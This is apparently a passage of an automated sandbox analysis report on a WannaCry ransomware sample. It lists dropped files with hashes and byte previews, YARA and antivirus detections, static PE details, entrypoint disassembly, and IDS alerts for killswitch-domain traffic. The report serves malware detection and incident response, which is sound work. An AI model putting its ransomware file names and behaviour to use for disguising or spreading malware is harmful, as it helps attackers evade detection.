Entropy (8bit):	0.7112352075765392
Encrypted:	false
SSDEEP:	192:BV7VDiDL/bDiDwTDiDHDiDDDiDSDiD8DiDkDiD0DiDEDiDMDiDMDiDMDiD:BhV2nT2UT272/2+2w2g2w2I2o2A2I2
MD5:	5D63AFB3EA60A7655FF95B4DB1B451E0
SHA1:	B5D236316CC6617071D83D7E1B4367DDA1A889B1
SHA-256:	815D1AE9187ED88319DDCD4F95D544E3B4FC3D12E2BF9A0DFD30441819089010
SHA-512:	C00665A8527B92BB677696119894947DA47603CD1168B3536E7317E8D82C1A3563D50612C4AEF5BDEE75D491AEC97F8AB543F5FA1EB5E4080E7B1D8A55FE57E6
Malicious:	false
Preview:	ElfChnk.............................................u.=k....................................................................Z}#.................N.......................v...=...........................................................................................................................f...............?...........................m...................M...F...............................'...........................................................................&.......................................**.................sf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 9, DIRTY
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	1.276658066211496
Encrypted:	false
SSDEEP:	768:rvEpP9JcY6+g4+Ga6oh+13xIb13xIb13xIt13xI:rspP9JcY6+g4+Ga6
MD5:	DC25ADD8A6F26EFBBDC461611302C83F
SHA1:	48BD8D39D6BD4BCE85D670429C15BC620B394152
SHA-256:	18BE2F3D46D68481424DE066F1364D45EC8C9C55BC55E98FFD06857C26141AC9
SHA-512:	2EA5A44BC4929BEB80020C7DE051E7EBB4341418A293404E29086A151BF02F80E0142D5C4047B1694E07F5551F6FB473EC68FDA277C69906F5B44CA66102280A
Malicious:	false
Preview:	ElfFile.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.361940141934218
Encrypted:	false
SSDEEP:	384:g9ZhlR0CsRNH9RnR0ORpm3RZRRLR4zuZFRbmXR9XPRFrRXVRcrRb8RWRrR4QRSRZ:0Zi4DHm3X3NI538LMi
MD5:	259ED3201A78F86065443851DBD48778
SHA1:	5CDE9701EAA71605CD1F0D21C14024BCC9301C69
SHA-256:	81DD034B4EC9A6A413712C7425877355BABB77FE5A8F3A9236D2049D804A0A91
SHA-512:	D6208991569416257A9833326F6CF02E748F7346ABA019FB0F4B1EDE169876B81B6A2DEE06EA51A8BADD7122F4EF798E79BC4ECF1968261B70A4896391E56C1F
Malicious:	false
Preview:	ElfChnk.J.......Q.......J.......Q...........p%..0..6_.!......................................................................^.....................C.......Q............(..=.......................................0"..d....................'..7#..........................................V(......(...f...+...........?....................... .......................M...F.......)(.......'..............................&............................................................&.....................................**......J.........l.f..........'.z&........'.z..^................A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.282820835556058
Encrypted:	false
SSDEEP:	384:chOhpuhdh+h9hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhr:cQsFpkBc1S
MD5:	7DB7567819F7CFC6955126B8306826E6
SHA1:	45CCB1C41CA1C6E1384207444A8B84437408DF1A
SHA-256:	0DDCE2B5ADFAAB4EF8A1686D0064B8CCFF43B1D3C93893A62EF07B7FB896E8E5
SHA-512:	FF5F662885580210B522215F56FD29417B6555F0878610D44D8F798E044876F99F86C5FF688BB77C92B894368E5DF32130B52BFE37401BACD3305B63463A2394
Malicious:	false
Preview:	ElfChnk.........................................P.....Q................................................................................................................:...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...............!.......................**...............k..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.232783163157918
Encrypted:	false
SSDEEP:	384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVMV3VJmVhpVEVA:Zyjbj
MD5:	71A005B17A2D32C10709277023D447E6
SHA1:	14754F04007D539159F75D62AACC6A282CAA8D54
SHA-256:	6E220C6CCBB76AEE639EDFCC6204C80EEC9FA1CCE0AC40EE4B821AF3AC27887B
SHA-512:	BC3533B3DEF1BC8B7D990700CA573EFF57D05C4E72DF2BB536247466D5FE9EB5DFE6F2EC18F02C808449F998AC00E26E920E3984B4E8367F8E9AF188BD1D9518
Malicious:	false
Preview:	ElfChnk.........!...............!............7..`8...).....................................................................Ce.~................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v................................................+......................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 5, DIRTY
Category:	dropped
Size (bytes):	4792
Entropy (8bit):	4.031413139496865
Encrypted:	false
SSDEEP:	96:EsVRNVaO8sow/sTYS5oz/sTf/sTpHZ/sTpb3rjjTF/sTz:EsdV7Xk8kozkDkNHZkNnvZkf
MD5:	F2F7D767F32EA456FA23AF9F68823FD0
SHA1:	D42A801AB09F58C021F3AB46CB0E99A3D32FF2DC
SHA-256:	CE2C2C08C4268F697A4DE59A7355132D03B7EB5EA274B01DF918879CE29F6FDE
SHA-512:	3DB505411D20307D10BC56C16668D2DECAE949CB3DF8A3777D8247AF9E5152B086FF6C22AFA43980956A299471ACD28E3DD96EACACDE31B2F3C90B12E4BE9318
Malicious:	false
Preview:	ElfFile......................................................................................................................RyNElfChnk.........................................8...h........................................................................zj................\...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................5...............&.......................................................................................**..............r..!..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.213395949522745
Encrypted:	false
SSDEEP:	384:qhZBwBjsrBwBhBwBj4BwB6p+/4WBwBQ/cBwBjQNqObx13ABwBqhdBwBQ/LQBwBQo:qOsc6QNqObxGyS3qes
MD5:	A208B4CFA6956737165D96729B289499
SHA1:	4DDF00D30283CE21E63BF52808AECD56CC782C60
SHA-256:	1EBFBC803748042ABDB923387A2FC52E0166BDB8C0CA185FE6D39C1A511FE59F
SHA-512:	5BF0832B3D33310D1F6F8847DEECD43333F562CD1D2EA4AA515C3A0D48B67E5FA4961241BC5EBBA2A558BB9A335F6C3DCBF6702E14AE77BEC0953760A59064FA
Malicious:	false
Preview:	ElfChnk.^.......m.......^.......m...........@;..p>.....,....................................................................3^05............................................=...........................................................................................................................f...............?...........................m...................M...F...........................g...............................................................................&.......................................**.. ...^...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.414298413407747
Encrypted:	false
SSDEEP:	384:3thQUE2UEFUE5UEKUEODUEzUEFUEsUE/UEGUE6UEWUE9UEtUEBUE8UEGUEuUE5UD:9w/RPoP6e
MD5:	77D9AFD001F6BBD592C19652D671FEA3
SHA1:	B87EA73299713B00D44A123C4B48636957EA90CE
SHA-256:	E25E174DE18D3B90B5EBC3C394A7C6BFC34F3E27FB260758BC8CB135E4D45770
SHA-512:	C81A545351015315060E812535A43C97A0FCBC2F49AA2034B50F963839F7F7DC1BC16EF070D5FF951E5FE82A9B315E8EFC20470707FD8C995A932E44369845E8
Malicious:	false
Preview:	ElfChnk.........................................8...,..t......................................................................>.......................................R...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................*..............._..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	102200
Entropy (8bit):	4.330935587115988
Encrypted:	false
SSDEEP:	384:qFRZFRTTjoNSg0PtocChoLu60zCwySonMt0SoHMtoLoHMtaoDoH5OD0obO9ZoJf+:M1PFj0Dyid9stqryVpxyUUZn2seQVJ
MD5:	B964C46F62C7CBADF0222F886ACEF0DA
SHA1:	1134AF0B29A97DFF5F7331EE1F1933A668AB420E
SHA-256:	BE7D395B338B0A3197238618F9D653C1F0036006AB4055F12DEB02E36DE126FA
SHA-512:	29F06F0DD3397455E7277812EA28A8F419BF6555746EACB7587DD1B688C432000E33293970F2BD2883ABAC3C6834AE33808CBAC595D5D0EB233E40638C31A2A2
Malicious:	false
Preview:	ElfChnk......................................... ...Q........................................................................IT....................s...h...............N...=...................................................N...............................................w.......6......................./...................................]...........).......M...T...:...............................................................................................................&...............................*.. ............q@!fg...........&.........*.9.LS5..f....A.......A..5...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....^...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	80416
Entropy (8bit):	4.373536947946228
Encrypted:	false
SSDEEP:	768:w6neo6nejMo46/iP6f/RfdRKe+PH+YekJ6nebFub:dGgMFfP67MPZdgus
MD5:	F155B0D8C6C51E5613235B4E766226D8
SHA1:	17490C50AA64ED18F254E0229E2925A5AC87031E
SHA-256:	1F023D658CD9A627DE9ED51661C95CA6DF00A5CB25DE6A19A02C1D857067A141
SHA-512:	77826ABC1C98CA3646B84AD1789F45D13B8334C8D8B43BD91FB18B2120599FDBDA68B0E1AFB5CEB0793A94F9735E2D38CC2A0B5CFFD270266B4B9E0DB21C8ADE
Malicious:	false
Preview:	ElfChnk.............................................X.p....................................................................._q6....................s...h...................=...................................................N...............................q...............w.......2.......................G...................................Y...........).......M...5...:........................................................................................................... .......................&...&.......**...............q@!fg.........#m.&........#m...].N.I.P.=.......A..1...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....Z...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\mssecsvc.exe

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3751936
Entropy (8bit):	7.965659720176834
Encrypted:	false
SSDEEP:	98304:8DqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2H:8DqPe1Cxcxk3ZAEUadzR8yc4H
MD5:	80F63BEA8710636ED2F30EAD25E07C82
SHA1:	333FF2D0719435F91D843BC742D650EFF0B37B42
SHA-256:	2492B02A6A76B328F120BB3D6A9FAAC9661EAD831D57993CA7108F4FC6F81828
SHA-512:	78F22CEE3B6390233AF846BB33EE5CF75123C723E78DCC5D8EABC8E5739BE3DCC8E4153664561C0033FE13E5079A487A9E5700BA4517F434CF016CA15E218F9C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly) Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT) Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=.A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L...?..K.....................08.....".............@.......................... g......................................................1.. 6..........................................................................................................text............................... ..`.rdata..............................@..@.data....H0......p..................@....rsrc.... 6...1.. 6.. ..............`...........................................................................................................................................................................................................................................................................................................................................................

C:\Windows\tasksche.exe

Download File

Process:	C:\Windows\mssecsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3514368
Entropy (8bit):	7.996072890929898
Encrypted:	true
SSDEEP:	98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2Hj:QqPe1Cxcxk3ZAEUadzR8yc4Hj
MD5:	7F7CCAA16FB15EB1C7399D422F8363E8
SHA1:	BD44D0AB543BF814D93B719C24E90D8DD7111234
SHA-256:	2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD
SHA-512:	83E334B80DE08903CFA9891A3FA349C1ECE7E19F8E62B74A017512FA9A7989A0FD31929BF1FC13847BEE04F2DA3DACF6BC3F5EE58F0E4B9D495F4B9AF12ED2B7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\tasksche.exe, Author: Joe Security Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly) Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Joe Sandbox View:	Filename: JRTn7b1kHg.dll, Detection: malicious, Browse Filename: S8LDvVdtOk.dll, Detection: malicious, Browse Filename: 9nNO3SHiV1.dll, Detection: malicious, Browse Filename: zbRmQrzaHY.dll, Detection: malicious, Browse Filename: zyeX8bTkky.dll, Detection: malicious, Browse Filename: qt680eucI4.dll, Detection: malicious, Browse Filename: 1w3BDu68Sg.dll, Detection: malicious, Browse Filename: qCc1a4w5YZ.exe, Detection: malicious, Browse Filename: stN592INV6.exe, Detection: malicious, Browse Filename: onq54JS79W.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.448369724067446
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	GeW4GzT8G8.dll
File size:	5'267'459 bytes
MD5:	78bd8b9c610315d7247e2076bbd9458c
SHA1:	a8029cfe179dfc15c9a52ecd4ad491403dc1c1ae
SHA256:	51d5805abb1d7fb68d037399193a5f1b019d23e455fe4a5b82d245a020b5b05b
SHA512:	b6eabd7e04cd4d70edbd2f2e1b44f14fc27943b405334da0784bf2442ffcb4669de6c48fa54581045196803f975d1da86e59726afc86437827a1becc1354cdbc
SSDEEP:	98304:NDqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2H:NDqPe1Cxcxk3ZAEUadzR8yc4H
TLSH:	1C363394612CB2FCF0450DB444638A6BB7B73C69A7BA4E1F9BC086660C53F5BAFD0641
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.r_9...9...9.......=...9...6.....A.:.......8.......8.......:...Rich9...........................PE..L...QW.Y...........!.......

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x100011e9
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp:	0x59145751 [Thu May 11 12:21:37 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2e5708ae5fed0403e8117c645fb23e5b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ebx
mov ebx, dword ptr [ebp+08h]
push esi
mov esi, dword ptr [ebp+0Ch]
push edi
mov edi, dword ptr [ebp+10h]
test esi, esi
jne 00007FAF7CEEFA0Bh
cmp dword ptr [10003140h], 00000000h
jmp 00007FAF7CEEFA28h
cmp esi, 01h
je 00007FAF7CEEFA07h
cmp esi, 02h
jne 00007FAF7CEEFA24h
mov eax, dword ptr [10003150h]
test eax, eax
je 00007FAF7CEEFA0Bh
push edi
push esi
push ebx
call eax
test eax, eax
je 00007FAF7CEEFA0Eh
push edi
push esi
push ebx
call 00007FAF7CEEF91Ah
test eax, eax
jne 00007FAF7CEEFA06h
xor eax, eax
jmp 00007FAF7CEEFA50h
push edi
push esi
push ebx
call 00007FAF7CEEF7CCh
cmp esi, 01h
mov dword ptr [ebp+0Ch], eax
jne 00007FAF7CEEFA0Eh
test eax, eax
jne 00007FAF7CEEFA39h
push edi
push eax
push ebx
call 00007FAF7CEEF8F6h
test esi, esi
je 00007FAF7CEEFA07h
cmp esi, 03h
jne 00007FAF7CEEFA28h
push edi
push esi
push ebx
call 00007FAF7CEEF8E5h
test eax, eax
jne 00007FAF7CEEFA05h
and dword ptr [ebp+0Ch], eax
cmp dword ptr [ebp+0Ch], 00000000h
je 00007FAF7CEEFA13h
mov eax, dword ptr [10003150h]
test eax, eax
je 00007FAF7CEEFA0Ah
push edi
push esi
push ebx
call eax
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
pop esi
pop ebx
pop ebp
retn 000Ch
jmp dword ptr [10002028h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[C++] VS98 (6.0) build 8168
[RES] VS98 (6.0) cvtres build 1720
[LNK] VS98 (6.0) imp/exp build 8168

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2190	0x48	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x203c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x500060	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x505000	0x5c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x28c	0x1000	8de9a2cb31e4c74bd008b871d14bfafc	False	0.13037109375	data	1.4429971244731552	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2000	0x1d8	0x1000	3dd394f95ab218593f2bc8eb65184db4	False	0.072509765625	data	0.7346018133622799	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3000	0x154	0x1000	fe5022c5b5d015ad38b2b77fc437a5cb	False	0.016845703125	Matlab v4 mat-file (little endian) C:\%s\%s, numeric, rows 0, columns 0	0.085238686413312	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4000	0x500060	0x501000	0d974739789faeadcad5565b969a79a7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x505000	0x2ac	0x1000	620f0b67a91f7f74151bc5be745b7110	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
W	0x4060	0x500000	data	English	United States	0.8778753280639648

Imports

DLL	Import
KERNEL32.dll	CloseHandle, WriteFile, CreateFileA, SizeofResource, LockResource, LoadResource, FindResourceA, CreateProcessA
MSVCRT.dll	free, _initterm, malloc, _adjust_fdiv, sprintf

Exports

Name	Ordinal	Address
PlayGame	1	0x10001114

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T16:57:15.577268+0100	2024291	ET MALWARE Possible WannaCry DNS Lookup 1	1	192.168.2.8	63761	1.1.1.1	53	UDP
2025-01-15T16:57:16.080006+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49704	104.16.166.228	80	TCP
2025-01-15T16:57:16.080006+0100	2024298	ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1	1	192.168.2.8	49704	104.16.166.228	80	TCP
2025-01-15T16:57:16.080006+0100	2024299	ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 2	1	192.168.2.8	49704	104.16.166.228	80	TCP
2025-01-15T16:57:16.080006+0100	2024301	ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 4	1	192.168.2.8	49704	104.16.166.228	80	TCP
2025-01-15T16:57:16.080006+0100	2024302	ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 5	1	192.168.2.8	49704	104.16.166.228	80	TCP
2025-01-15T16:57:16.080806+0100	2031515	ET MALWARE Known Sinkhole Response Kryptos Logic	3	104.16.166.228	80	192.168.2.8	49704	TCP
2025-01-15T16:57:25.556934+0100	2012730	ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup	1	192.168.2.8	64320	1.1.1.1	53	UDP
2025-01-15T16:57:28.691144+0100	2024291	ET MALWARE Possible WannaCry DNS Lookup 1	1	192.168.2.8	64182	1.1.1.1	53	UDP
2025-01-15T16:57:29.208532+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49710	104.16.167.228	80	TCP
2025-01-15T16:57:29.208532+0100	2024298	ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1	1	192.168.2.8	49710	104.16.167.228	80	TCP
2025-01-15T16:57:29.208532+0100	2024299	ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 2	1	192.168.2.8	49710	104.16.167.228	80	TCP
2025-01-15T16:57:29.208532+0100	2024301	ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 4	1	192.168.2.8	49710	104.16.167.228	80	TCP
2025-01-15T16:57:29.208532+0100	2024302	ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 5	1	192.168.2.8	49710	104.16.167.228	80	TCP
2025-01-15T16:57:29.210203+0100	2031515	ET MALWARE Known Sinkhole Response Kryptos Logic	3	104.16.167.228	80	192.168.2.8	49710	TCP
2025-01-15T16:57:29.292333+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49711	104.16.167.228	80	TCP
2025-01-15T16:57:29.292333+0100	2024298	ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1	1	192.168.2.8	49711	104.16.167.228	80	TCP
